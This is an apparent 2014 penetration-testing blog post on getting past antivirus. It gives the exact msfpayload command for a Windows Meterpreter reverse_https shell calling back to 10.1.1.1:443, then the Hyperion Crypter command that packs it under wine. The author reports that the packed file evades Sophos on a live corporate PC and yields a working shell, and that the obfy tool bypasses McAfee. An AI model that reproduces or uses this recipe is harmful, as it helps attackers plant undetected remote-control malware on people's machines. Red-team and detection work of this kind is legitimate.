Tuesday, July 22, 2014

Obfy,Hyperion Crypter, and bypassing AV

I've noticed for a while now that payloads made by obfy that are encrypted with Hyperion Crypter don't seem to work on my system. I figured I screwed up crypter on my VM. But that isn't it, something else is wrong, I think.

First let me say there is a new version of Hyperion Crypter, you should download it and compile and install it.

Now with that out of the way I'm testing Sophos right now. While obfy by itself seems to still bypass McAfee with no issues it doesn't get past Sophos and with the crypter part broken I needed to do something else. So I tried smbexec and it worked fine against Sophos and I noted that the payload was encrypted by crypter and it worked. Note the compile and install it link above for smbexec and crypter info if that is new to you. So that got me wondering. Next I made a simple payload:
msfpayload windows/meterpreter/reverse_https LHOST=10.1.1.1 LPORT=443 X >payload.exe
Then I ran crypter.exe on it:
cd /opt/crypter (crypter only seems to work while you are in the directory)
wine ./crypter.exe /root/payload.exe payloadc.exe

Payload.exe was picked up by Sohpos and will be by any AV program. But pyaloadc.exe worked fine and the shell worked. Simple as that. No viel framework, smbexec, encoding, magic or anything needed. msfpayload generated exe file ran though crypter.exe and Sohpos is fine with it. Two steps and easy (it should be noted this is the Sophos install I'm testing against which is a live corp PC and not managed/installed by me so it may or may not be everything they can do to detect payloads, configured well, etc).

This goes to show different AV bypassing techniques work better for different vendors and having many tools to pull from is your best option. That said, it annoys me why crypter.exe creates broken executables with obfy files but not msfpayload files and I don't know why or why it suddenly stopped working when I didn't change anything. I don't even know if this is a problem with everyone or just me.

If you use this tool and have feedback let me know. If I hear that it doesn't work for other people too and collectively we can't figure out why I will probably pull that option from the code. In reality the more powerful part of obfy is altering the ASM of just about any ASM file you feed into it quickly to save you the time of doing it manually. In that case it is still a nice supporting tool, and of course for the time being a bypass McAfee button for some strange reason. I expect that part to stop working, someday.

No comments:

Post a Comment